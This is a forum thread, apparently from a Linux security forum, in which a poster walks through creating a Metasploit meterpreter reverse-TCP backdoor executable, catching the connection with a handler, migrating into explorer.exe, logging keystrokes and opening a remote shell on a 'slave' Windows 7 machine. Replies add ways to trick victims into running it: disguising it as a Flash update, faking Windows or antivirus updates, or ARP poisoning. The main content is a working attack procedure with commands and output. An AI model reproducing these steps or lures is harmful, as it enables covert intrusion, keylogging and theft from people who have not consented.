Author Topic: How i Hacked into win7 sp1.  (Read 21419 times)

ultra_lazer

  • Guest
on: January 11, 2012, 08:27:00 AM
Hi there everyone.
I got a 2nd machine at home running win7 mostly used for gaming, last night a received an SP1 update along with several security updates that followed, so i decided to try my luck and attempt to hack into it. it worked , this is in details how i did it  :

Step 1: ultralazer@backbox:/opt/metasploit3/msf3# .
/msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/backdoor.exe


Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.0.23 ,LPORT=4444
ultralazer@backbox:/opt/metasploit3/msf3#


Also, now on your backbox desktop, you would be seeing a backdoor.exe file.


After executing the backdoor.exe on your slave's computer follow these steps:
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.23
LHOST => 192.168.0.23
msf exploit(handler) > set LPORT 4444
LPORT => 4444



All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit



You would see a meterpreter prompt like this
meterpreter >
meterpreter > sessions -i

Type in ps to list the active processes
meterpreter > ps


Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
  • Migrating to 5716...
  • Migration completed successfully.

meterpreter >



Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on slave, just type keyscan_start


Now, if you want to go to the slave’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>


You would now be having a command prompt,
Type in whoami, to see the computer’s name of slave :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>



Let’s say the slave has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystroke

 ;D I will be installing win8 soon and i will try this exploit on it, then i will let you all know.  ;D

Ultra_Lazer



berghem

  • Jr. Member
  • **
  • Posts: 97
    • View Profile
    • http://lorenzistefano.com
Reply #1 on: January 11, 2012, 09:01:27 AM
tks, is very nice!


break0x90

  • Newbie
  • *
  • Posts: 30
    • View Profile
Reply #2 on: January 12, 2012, 05:46:44 PM
ultra_lazer this is funny... the curiosity is how to run backdoor.exe by victim...



ultra_lazer

  • Guest
Reply #3 on: January 12, 2012, 06:17:42 PM
Hi
" Backdoor was an example" originally was named " Adobe-flash-update.exe".
Use ur fantasy !! ;)



break0x90

  • Newbie
  • *
  • Posts: 30
    • View Profile
Reply #4 on: January 13, 2012, 09:25:54 AM
yep but... i think that is necessary force a fake windows update or antivirus update.. or using a proxy with an arp poisoning attack :)



li9h7

  • Guest
Reply #5 on: February 22, 2012, 08:13:22 AM
thanks... nice



xeeoz

  • Newbie
  • *
  • Posts: 1
    • View Profile
Reply #6 on: April 22, 2012, 05:31:32 PM
Hey Im kinda new to all this stuff....
Do you type the first commands in terminal or msf shell?


bash: /opt/metasploit3/msf3#: No such file or directory


Sorry,im new :(



ostendali

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 587
    • View Profile
Reply #7 on: April 23, 2012, 04:05:02 PM
Hey Im kinda new to all this stuff....
Do you type the first commands in terminal or msf shell?


bash: /opt/metasploit3/msf3#: No such file or directory


Sorry,im new :(
the RTFM before asking such questions here around....
pls read carefully forum disclaimer here: http://forum.backbox.org/announcements/general-forum-conditions/



Anti

  • Newbie
  • *
  • Posts: 1
    • View Profile
Reply #8 on: October 14, 2012, 12:39:04 AM
Hey Lazer, can i translate your anticle and post on my blog?



ltdan

  • Guest
Reply #9 on: April 29, 2013, 02:39:02 AM
Thanx for the post ultra_lazer worked on it today. 

lt